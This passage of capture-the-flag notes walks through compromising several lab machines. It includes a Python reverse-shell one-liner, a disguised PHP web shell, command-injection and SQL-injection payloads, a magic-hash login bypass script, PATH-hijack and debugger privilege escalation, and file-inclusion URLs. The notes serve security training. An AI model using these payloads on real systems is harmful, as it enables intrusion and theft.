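    blocked = db.register(TARGET, "attacker")    # a plain duplicate is refused
    crafted = craft_collision(TARGET)
    accepted = db.register(crafted, "attacker")  # the padded variant slips through
    return {
        "direct_duplicate_blocked": not blocked,
        "crafted_accepted": accepted,
        "stored_email": db.rows[-1][0],
        "admin_login_with_attacker_password": db.login(TARGET, "attacker"),
    }


if __name__ == "__main__":
    for key, value in run_attack().items():
        print(f"{key}: {value!r}")
```

The fix on the application side is to reject input longer than the column (or run MySQL in strict mode) and to put a UNIQUE constraint on the column, so that the truncated duplicate fails at INSERT time rather than at the application's pre-check.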

from reader to root

  • I could connect to the db and try to get the password of admin…
  • no suid that I could see
  • no sudo -l
  • in the database the password is not salted or hashed: Sup3r_S3cur3_P455
  • maybe something is executed at regular intervals…
  • I see in the suid list something about lxc and there is an exploit…
    • no way, I don't have the lxc group
  • I saw that there is a logrotate run every now and then as root
    • and there is an exploit for that https://github.com/whotwagner/logrotten
    • it exploits a race condition in logrotate, making it possible to write a file as the user root
    • we could try to copy our authorized_keys to /root/.ssh/authorized_keys

echo "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.6\",4646));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" > payloadfile
./logrotten -d -p ./payloadfile /home/reader/backups/access.log

Link to original

Machine - PopCorn - Linux - Medium -abandoned

Machine - PopCorn - Linux - Medium

22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.12 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))
| http-enum:
|   /test/: Test page
|   /test.php: Test page
|   /test/logon.html: Jetty
|_  /icons/: Potentially interesting folder w/ directory listing
|_http-server-header: Apache/2.2.12 (Ubuntu)
  • php5.2.10
  • ubuntu 6.10
  • test folder always shows a phpinfo
  • fuzzing for .txt or .php
000004023:   301        9 L      28 W       310 Ch      "torrent"
000011416:   301        9 L      28 W       309 Ch      "rename"
  • in the torrent
    • we could upload a torrent
    • let's try to modify the torrent to add a cmd …
    • no way :(
    • there is a way to upload a png
    • I could upload the png, but I saw no way of executing it
    • let's see if I can move it with the rename endpoint
    • yey! we got our magic php shell :) (the PNG magic bytes go first so the upload's image check passes)
echo -n -e '\x89\x50\x4E\x47' > img.php.png
echo '<?php system($_GET["cmd"]); ?>' >> img.php.png
from www-data to george or root
  • enumeration
    • mysql local
    • pspy
      • nothing interesting
      • sudo -l nothing
    • there is the source code of the torrenthoster
      • let's pull it to my pc
  $CFG->host = "localhost";
  $CFG->dbName = "torrenthoster";       //db name
  $CFG->dbUserName = "torrent";    //db username
  $CFG->dbPassword = "SuperSecret!!";   //db password
|  3 | Admin    | d5bfedcee289e5e05b86daad8ee3e2e2 | admin     | admin@yourdomain.com | 2007-01-06 21:12:46 | 2007-01-06 21:12:46 |

let’s try to crack the md5 hash no luck :(

  • abandon!

Link to original

Machine - Falafel - Linux - Hard - abandoned

Machine - Falafel - Linux - Hard - abandoned

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 36:c0:0a:26:43:f8:ce:a8:2c:0d:19:21:10:a6:a8:e7 (RSA)
|   256 cb:20:fd:ff:a8:80:f2:a2:4b:2b:bb:e1:76:98:d0:fb (ECDSA)
|_  256 c4:79:2b:b6:a9:b7:17:4c:07:40:f3:e5:7c:1a:e9:dd (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/*.txt
|_http-title: Falafel Lovers
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-enum:
|   /login.php: Possible admin folder
|_  /robots.txt: Robots file
|_http-server-header: Apache/2.4.18 (Ubuntu)

Enumeration http

From: Falafel Network Admin (admin@falafel.htb)
Subject: URGENT!! MALICIOUS SITE TAKE OVER!
Date: November 25, 2017 3:30:58 PM PDT
To: lawyers@falafel.htb, devs@falafel.htb
Delivery-Date: Tue, 25 Nov 2017 15:31:01 -0700
Mime-Version: 1.0
X-Spam-Status: score=3.7 tests=DNS_FROM_RFC_POST, HTML_00_10, HTML_MESSAGE, HTML_SHORT_LENGTH version=3.1.7
X-Spam-Level: ***

A user named "chris" has informed me that he could log into MY account without knowing the password,
then take FULL CONTROL of the website using the image upload feature.
We got a cyber protection on the login form, and a senior php developer worked on filtering the URL of the upload,
so I have no idea how he did it.

Dear lawyers, please handle him. I believe Cyberlaw is on our side.
Dear develpors, fix this broken site ASAP.

	~admin

using sqlmap we got the dump of the database

Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: username=-8697' OR 1118=1118-- bVwQ&password=admin
[10:32:40] [INFO] retrieved: 1
[10:32:41] [INFO] retrieved: 0e462096931906507119562988736854
[10:32:57] [INFO] retrieved: admin
[10:32:59] [INFO] retrieved: admin
[10:33:01] [INFO] retrieved: 2
[10:33:02] [INFO] retrieved: d4ee02a22fc872e36d9e3751ba72ddc8
[10:33:18] [INFO] retrieved: normal
[10:33:20] [INFO] retrieved: chris
[10:33:23] [INFO] recognized possible
Login as admin

chris's password is "juggling"; the hash of admin I could not crack…

but I think we should be able to login with the sqli

in the end it is also type juggling (chris's password is the hint): the admin hash starts with 0e and the rest are digits, so PHP's loose comparison (==) treats it as a numeric string equal to 0. If we find a password whose md5 also starts with 0e followed only by digits, both sides compare equal to 0 and we log in

admin 240610708
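
The magic-hash comparison above, as an added example that is not the Falafel site's code: a Python model of PHP's loose `==` between two strings (both numeric strings are compared as numbers), a check for "0e" hashes, and a bounded brute-force search. The admin hash is the one dumped with sqlmap above; the comparison rule and the helper names are mine.

```python
#!/usr/bin/env python3
"""PHP type-juggling login bypass with md5 "magic hashes".

Added example, not the Falafel site's code. It models PHP's loose `==`
between two strings: if both are numeric strings they are compared as
numbers, so "0e<digits>" == "0e<other digits>" because both evaluate to 0.
"""
import hashlib
import itertools
import re
import string

ADMIN_HASH = "0e462096931906507119562988736854"   # admin's md5 dumped with sqlmap (from the notes)
NUMERIC = re.compile(r"^\s*[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?\s*$")
MAGIC = re.compile(r"^0e[0-9]+$")


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def php_loose_equals(a: str, b: str) -> bool:
    """PHP `$a == $b` for two strings: numeric strings compare as numbers."""
    if NUMERIC.match(a) and NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def is_magic(hexdigest: str) -> bool:
    """True if the hash is '0e' followed only by digits, i.e. numerically zero."""
    return MAGIC.fullmatch(hexdigest) is not None


def bypasses_login(stored_hash: str, candidate: str) -> bool:
    """What `if (md5($password) == $row['password'])` evaluates to in PHP."""
    return php_loose_equals(md5_hex(candidate), stored_hash)


def search_magic(alphabet: str = string.digits, max_len: int = 9, limit: int = 200_000):
    """Brute-force search for a magic hash; returns (plaintext, hash) or None.

    Roughly one string in 2e7 qualifies, so a real search needs far more than
    `limit` tries; the bound keeps the demonstration quick.
    """
    tried = 0
    for length in range(1, max_len + 1):
        for chars in itertools.product(alphabet, repeat=length):
            candidate = "".join(chars)
            digest = md5_hex(candidate)
            if is_magic(digest):
                return candidate, digest
            tried += 1
            if tried >= limit:
                return None
    return None


if __name__ == "__main__":
    for pw in ("240610708", "QNKCDZO", "juggling"):
        print(pw, md5_hex(pw), "bypass" if bypasses_login(ADMIN_HASH, pw) else "no")
```

The fix is `===` (or password_verify with a real password hash), which never coerces strings to numbers; note that the bypass still works on PHP 8, because the PHP 8 comparison change only affects string-versus-number, not two numeric strings.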

Upload image /// shell
 python image.py "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCAAABB.php.png"

the file name is longer than what the server-side download (wget) keeps, so the saved name is truncated and loses the .png, leaving a file that ends in .php. we got a shell :D

from www-data to …
   define('DB_SERVER', 'localhost:3306');
   define('DB_USERNAME', 'moshe');
   define('DB_PASSWORD', 'falafelIsReallyTasty');
   define('DB_DATABASE', 'falafel');

let's improve our shell with rlwrap

we try the password in ssh and voilà, we are moshe now :)

from moshe to root?

there is another user yossi

/$ id
uid=1001(moshe) gid=1001(moshe) groups=1001(moshe),4(adm),8(mail),9(news),22(voice),25(floppy),29(audio),44(video),60(games)
Linux falafel 4.4.0-112-generic #135-Ubuntu SMP Fri Jan 19 11:48:36 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
Distributor ID: Ubuntu
Description:    Ubuntu 16.04.3 LTS
Release:        16.04
Codename:       xenial

pspy

  • nothing
Link to original

Machine Previse - Active - Easy

Machine Previse - Active - Easy

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
|   256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_  256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
fuzzing
  • no extension
  • php extension
    • we found some php that need to be auth to see
    • config.php
    • nav.php shows the other php files, probably
    • accounts.php
      • there is a redirect, but in curl you still get the page body (the 302 response carries the full page)
      • we could do a POST to create a new user/password :devil:
      • YEEY we got a user :D
  • txt extension
inspecting web page
  • there is a login
  • it says a file service
  • is using phpsession
  • no js or comments
Step 2: what we can do with an admin user…
  • there is a file uploaded by newguy
    • there is a config.php with mysql credentials
    $host = 'localhost';
    $user = 'root';
    $passwd = 'mySQL_p@ssw0rd!:)';
    $db = 'previse';

in the code we see this


$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
echo $output;

$filepath = "/var/www/out.log";
$filename = "out.log"; 

delim goes unescaped into exec(), which is a command injection: a way to execute whatever we want :)

curl 'http://10.10.11.104/logs.php' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:93.0) Gecko/20100101 Firefox/93.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://10.10.11.104' -H 'Connection: keep-alive' -H 'Referer: http://10.10.11.104/file_logs.php' -H 'Cookie: PHPSESSID=t3t07dbpsn2et1o41iapan02ch' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'delim=%24%28python%20-c%20%27import%20socket%2Csubprocess%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.conn

we got our shell :)

Step 3: we are www-data now what?
  • we can not see yet the user flag :(
  • we can connect to the db (root / mySQL_p@ssw0rd!:) from config.php) and dump the accounts
  • m4lwhere's password hash: $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. (md5crypt, with an emoji in the salt)
  • cracking it with john the ripper gives ilovecody112235! for user m4lwhere
Step 4: to be root …
  • sudo -l
    • we can execute a script as root
    • the binaries in the script are called without full paths
    • so we can abuse the PATH env variable to run the code we want :)
$ export PATH=$(pwd):$PATH
$ cat /tmp/gzip
#!/bin/bash
chmod u+s /bin/bash
$ chmod +x /tmp/gzip
$ sudo /opt/scripts/access_backup.sh
Link to original

Machine - Forge - Active - Medium - done

Machine - Forge - Active - Medium

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 4f:78:65:66:29:e4:87:6b:3c:cc:b4:3a:d2:57:20:ac (RSA)
|   256 79:df:3a:f1:fe:87:4a:57:b0:fd:4e:d0:54:c6:28:d9 (ECDSA)
|_  256 b0:58:11:40:6d:8c:bd:c5:72:aa:83:08:c5:51:fb:33 (ED25519)
80/tcp open  http    Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://forge.htb
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: Host: 10.10.11.111; OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • let's add forge.htb to the hosts file
exploration
  • we can upload images… (attack vector)
  • we can request from a url
FUZZ
  • there is an admin vhost admin.forge.htb
    • Only localhost is allowed!
  • using the upload-from-url feature we made the server fetch the admin vhost for us (SSRF) and saw a credential for an ftp user: user:heightofsecurity123!
        <li>An internal ftp server has been setup with credentials as user:heightofsecurity123!</li>
        <li>The /upload endpoint now supports ftp, ftps, http and https protocols for uploading from url.</li>
        <li>The /upload endpoint has been configured for easy scripting of uploads, and for uploading an image, one can simply pass a url with ?u=&lt;url&gt;.</li>
  • ssh only allows to login with key… which makes me think if we can get some id_rsa or upload an authorized_…
 <div id="content">
            <h2 onclick="show_upload_local_file()">
                Upload local file
            </h2>
            <h2 onclick="show_upload_remote_file()">
                Upload from url
            </h2>
            <div id="form-div">

            </div>
        </div>
function show_upload_local_file(argument) {
    var form_div = document.getElementById('form-div');
    form_div.innerHTML = `
        <form action="/upload" method="POST" enctype="multipart/form-data">
            <input type="file" name="file" class="file">
            <input name="local" type="hidden" value='1'>
            <br>
            <br>
            <button id="submit-local" type="submit" class="submit">Submit</button>
        </form>
        `;
}

function show_upload_remote_file(argument) {
    var form_div = document.getElementById('form-div');
    form_div.innerHTML = `
    <br><br>
        <form action="/upload" method="POST" enctype="application/x-www-form-urlencoded" >
            <input type="textbox" name="url" class="textbox">
            <input name="remote" type="hidden" value='1'>
            <br>
            <br>
            <button id="submit-remote" type="submit" class="submit">Submit</button>
        </form>
        `;
}

with a bit of tweaking of the urlencoding, we get to see the user flag :)

also we can read the .ssh/id_rsa and with that we can log into the user with ssh :D

user to …

sudo (ALL : ALL) NOPASSWD: /usr/bin/python3 /opt/remote-manage.py

#!/usr/bin/env python3
import socket
import random
import subprocess
import pdb

port = random.randint(1025, 65535)

try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(('127.0.0.1', port))
    sock.listen(1)
    print(f'Listening on localhost:{port}')
    (clientsock, addr) = sock.accept()
    clientsock.send(b'Enter the secret passsword: ')
    if clientsock.recv(1024).strip().decode() != 'secretadminpassword':
        clientsock.send(b'Wrong password!\n')
    else:
        clientsock.send(b'Welcome admin!\n')
        while True:
            clientsock.send(b'\nWhat do you wanna do: \n')
            clientsock.send(b'[1] View processes\n')
            clientsock.send(b'[2] View free memory\n')
            clientsock.send(b'[3] View listening sockets\n')
            clientsock.send(b'[4] Quit\n')
            option = int(clientsock.recv(1024).strip())
            if option == 1:
                clientsock.send(subprocess.getoutput('ps aux').encode())
            elif option == 2:
                clientsock.send(subprocess.getoutput('df').encode())
            elif option == 3:
                clientsock.send(subprocess.getoutput('ss -lnt').encode())
            elif option == 4:
                clientsock.send(b'Bye\n')
                break
except Exception as e:
    print(e)
    pdb.post_mortem(e.__traceback__)
finally:
    quit()

since the whole thing is wrapped in a try/except that ends in pdb.post_mortem… connect to the printed port (nc 127.0.0.1 <port>), send secretadminpassword and then close the client with Ctrl-C: recv() returns an empty string, int('') raises a ValueError, the except catches it and pdb drops into an interactive debugger on the sudo terminal. That is a Python prompt running as root: import os and os.system("/bin/bash") gives the root shell.

Link to original

Machine - Devzat - active - medium - completed!

Machine - Devzat - active - medium

PORT     STATE SERVICE  REASON
22/tcp   open  ssh      syn-ack ttl 63
80/tcp   open  http     syn-ack ttl 63
8000/tcp open  http-alt syn-ack ttl 63
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 c2:5f:fb:de:32:ff:44:bf:08:f5:ca:49:d4:42:1a:06 (RSA)
|   256 bc:cd:e8:ee:0a:a9:15:76:52:bc:19:a4:a3:b2:ba:ff (ECDSA)
|_  256 62:ef:72:52:4f:19:53:8b:f2:9b:be:46:88:4b:c3:d0 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://devzat.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
8000/tcp open  ssh     (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-Go
| ssh-hostkey:
|_  3072 6a:ee:db:90:a6:10:30:9f:94:ff:bf:61:95:2a:20:63 (RSA)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.92%I=7%D=11/3%Time=6182EB1F%P=x86_64-pc-linux-gnu%r(NU
SF:LL,C,"SSH-2\.0-Go\r\n");
Service Info: Host: devzat.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
fuzz on :80
fuzz on vhost
  • pets.devzat.htb
    • < Server: My genious go pet server
curl 'http://pets.devzat.htb/api/pet' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:93.0) Gecko/20100101 Firefox/93.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: http://pets.devzat.htb/aaa' -H 'Content-Type: text/plain;charset=UTF-8' -H 'Origin: http://pets.devzat.htb' -H 'Connection: keep-alive' --data-raw '{"name":"ddd","species":"giraffe"}'
  • tried simple sql injection and the insert has changed…
curl 'http://pets.devzat.htb/api/pet' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:93.0) Gecko/20100101 Firefox/93.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: http://pets.devzat.htb/aaa' -H 'Content-Type: text/plain;charset=UTF-8' -H 'Origin: http://pets.devzat.htb' -H 'Connection: keep-alive' --data-raw $'{"name":"something\' or 1=1 -- -"}'

with the species parameter we can run commands, e.g. ; cat /etc/passwd (the value ends up in a shell)

we can read the .ssh/id_rsa :) YEEEY

explore

ssh -l [username] devzat.htb -p 8000 gets into the chat (the page has an email patric@devzat.htb)

patrick to…

  • we can not yet read catherine's files :(
  • sudo -l: I don't have the password…
  • suid: nothing interesting
  • in the chat app I see the following "chats":

admin: Connection to localhost closed.
patrick@devzat:~$ ssh -l catherine localhost -p 8000
patrick: Hey Catherine, glad you came.
catherine: Hey bud, what are you up to?
patrick: Remember the cool new feature we talked about the other day?
catherine: Sure
patrick: I implemented it. If you want to check it out you could connect to the local dev instance on port 8443.
catherine: Kinda busy right now 👔
patrick: That's perfectly fine 👍  You'll need a password I gave you last time.
catherine: k
patrick: I left the source for your review in backups.
catherine: Fine. As soon as the boss let me off the leash I will check it out.
patrick: Cool. I am very curious what you think of it. See ya!
devbot: patrick has left the chat
admin: Hey patrick, you there?
patrick: Sure, shoot boss!
admin: So I setup the influxdb for you as we discussed earlier in business meeting.
patrick: Cool 👍
admin: Be sure to check it out and see if it works for you, will ya?
tcp        0      0 127.0.0.1:8443          0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:5000          0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:8086          0.0.0.0:*               LISTEN

8443 is another Go ssh (the dev instance, on localhost), 8086 is influxdb

if we connect to the ssh on 8443, we see a chat with a new command /file, but it needs a password; the backups dir is only readable by catherine.

I think there should be some kind of hint in the influxdb: "CeilingCatStillAThingIn2021?"

Link to original

Machine - Traverxec - Retired - Easy

Machine - Traverxec - Retired - Easy

IP=10.10.10.165

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-title: TRAVERXEC
|_http-server-header: nostromo 1.9.6
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Exploration
fuzz
human
http-enum
exploit

searchsploit shows that there is a remote code execution in nostromo 1.9.6 (CVE-2019-16278, a path traversal that reaches /bin/sh and runs the POST body)…

www-data to…
  • there is a user named david
  • no suid
  • uname Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64 GNU/Linux
  • debian 10
  • processes
  • found this hash david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
    • cracks to Nowonly4me
  • the folder ~david is reachable by www-data
  • there is a copy of the id_rsa
david to root
uid=1000(david) gid=1000(david) groups=1000(david),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

there is a video… let's capture the frame

cat /dev/fb0 > file.raw; cat /sys/class/graphics/fb0/virtual_size to know the size; on https://rawpixels.net/ we can see the image (reading /dev/fb0 needs the video group, which david has)

the video doesn't seem to give us anything…
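
The framebuffer capture above, converted offline instead of on rawpixels.net, as an added example (not from the notes). It assumes the usual Linux console layout of 32 bits per pixel in BGRX order and takes the geometry from the "width,height" string in /sys/class/graphics/fb0/virtual_size; the output is a binary PPM (P6), which any image viewer opens. The file names are placeholders.

```python
#!/usr/bin/env python3
"""Turn a raw /dev/fb0 dump into a viewable image offline.

Added example for the Traverxec notes. Assumes 32 bpp BGRX pixels (the
common console framebuffer format) and a "W,H" geometry string as found in
/sys/class/graphics/fb0/virtual_size.
"""
import sys


def parse_virtual_size(text: str) -> tuple:
    """'1024,768\\n' -> (1024, 768)."""
    width, height = (int(v) for v in text.strip().split(","))
    return width, height


def fb_to_ppm(raw: bytes, width: int, height: int, bytes_per_pixel: int = 4) -> bytes:
    """Convert BGRX pixel data to a P6 PPM; bytes past one frame are ignored."""
    needed = width * height * bytes_per_pixel
    if len(raw) < needed:
        raise ValueError(f"need {needed} bytes for {width}x{height}, got {len(raw)}")
    frame = raw[:needed]
    header = f"P6\n{width} {height}\n255\n".encode()
    pixels = bytearray(width * height * 3)
    # Reorder BGRX -> RGB with strided slice assignment (no per-pixel Python loop).
    pixels[0::3] = frame[2::bytes_per_pixel]   # R
    pixels[1::3] = frame[1::bytes_per_pixel]   # G
    pixels[2::3] = frame[0::bytes_per_pixel]   # B
    return header + bytes(pixels)


def main(argv) -> int:
    if len(argv) != 4:
        print("usage: fb2ppm.py file.raw 'W,H' out.ppm", file=sys.stderr)
        return 2
    width, height = parse_virtual_size(argv[2])
    with open(argv[1], "rb") as fh:
        raw = fh.read()
    with open(argv[3], "wb") as out:
        out.write(fb_to_ppm(raw, width, height))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

If the result looks skewed, the framebuffer line length is larger than the visible width; /sys/class/graphics/fb0/stride (in bytes) divided by 4 is then the width to pass, and the image is cropped afterwards.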

dip is for controlling the dial-up (modem)

plugdev

netdev

there is a script that we can run as sudo…

it is journalctl, which spawns a less pager; inside less, !/bin/sh starts a shell as the user running the pager, i.e. root under sudo. The terminal has to be small enough that the output does not fit on one screen, otherwise no pager is started.

Link to original


Machine - Monitors - Hard

Machine - Monitors - Hard

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63
$  nmap -sC -sV -p80,22  10.10.10.238 -Pn -oN  ports
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ba:cc:cd:81:fc:91:55:f3:f6:a9:1f:4e:e8:be:e5:2e (RSA)
|   256 69:43:37:6a:18:09:f5:e7:7a:67:b8:18:11:ea:d7:65 (ECDSA)
|_  256 5d:5e:3f:67:ef:7d:76:23:15:11:4b:53:f8:41:3a:94 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=iso-8859-1).
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
$ nmap -sV --script=http-enum -p80 10.10.10.238

Exploratory

SSH doesn't seem vulnerable. HTTP:

Sorry, direct IP access is not allowed.  
  
If you are having issues accessing the site then contact the website administrator: admin@monitors.htb

add to the hosts files

we see a WordPress 5.5.0 :)

Wordpress vuln?

fuzz using https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/CMS/wordpress.fuzz.txt and curl https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/CMS/wp-plugins.fuzz.txt > wp-plugins.txt

plugins: nothing interesting found… themes: nothing interesting found

looking at the page source, I see the wp-with-spritz plugin is in use

its url parameter is a file inclusion :) it reads local files through path traversal and also fetches remote URLs

/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec

marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash

let’s also check the hostnames, since I think there are multiple vhosts… (no luck)

from /etc/lsb-release:

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04.5 LTS"
from wp-config.php:

define( 'DB_NAME', 'wordpress' );
 
/** MySQL database username */
define( 'DB_USER', 'wpadmin' );
 
/** MySQL database password */
define( 'DB_PASSWORD', 'BestAdministrator@2020!' );
 
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
 
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
 
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
from the Apache vhost config:

#ServerName www.example.com
	ServerAdmin admin@monitors.htb
	ServerName cacti-admin.monitors.htb
	DocumentRoot /usr/share/cacti
	ServerAlias cacti-admin.monitors.htb
	# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
	# error, crit, alert, emerg.
	# It is also possible to configure the loglevel for particular
	# modules, e.g.
	#LogLevel info ssl:warn
	ErrorLog /var/log/cacti-error.log
	CustomLog /var/log/cacti-access.log common
	# For most configuration files from conf-available/, which are
	# enabled or disabled at a global level, it is possible to
	# include a line for only one particular virtual host. For example the
	# following line enables the CGI configuration for this host only
	# after it has been globally disabled with "a2disconf".
	#Include conf-available/serve-cgi-bin.conf

cacti-admin.monitors.htb: we can log in to Cacti as admin with the database password..

searchsploit also has an exploit for Cacti that sends a reverse shell back to a listening nc
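
As an added example (not code from the original notes), a small Python helper for the steps above: it builds the spritz inclusion URL and pulls the useful parts out of the files read through it. The host name and plugin path are the ones from these notes; the sample file contents are the snippets shown above, embedded as constructed input; the 10.10.14.2 attacker address in the usage is assumed.

```python
import re

# Added example (not from the original notes): build the wp-with-spritz inclusion URL
# and pull the useful bits out of the files it returns. The host and plugin path are
# the ones from the notes; the file contents below are constructed sample input copied
# from what the notes show.

SPRITZ = "/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php"


def lfi_url(host, target, depth=4, scheme="http"):
    """Return the URL that makes the plugin include `target`.

    Absolute local paths get `depth` '../' steps in front (as in the notes);
    an http(s) URL is passed through unchanged (remote inclusion)."""
    if target.startswith(("http://", "https://")):
        path = target
    else:
        path = "/" + "../" * depth + target.lstrip("/")
    return f"{scheme}://{host}{SPRITZ}?url={path}"


# define( 'KEY', 'value' );  -- tolerant of spacing and of either quote style
WP_DEFINE = re.compile(r"""define\(\s*['"](\w+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""")


def parse_wp_config(text):
    """Return {KEY: value} for every define() in a wp-config.php read through the LFI."""
    return dict(WP_DEFINE.findall(text))


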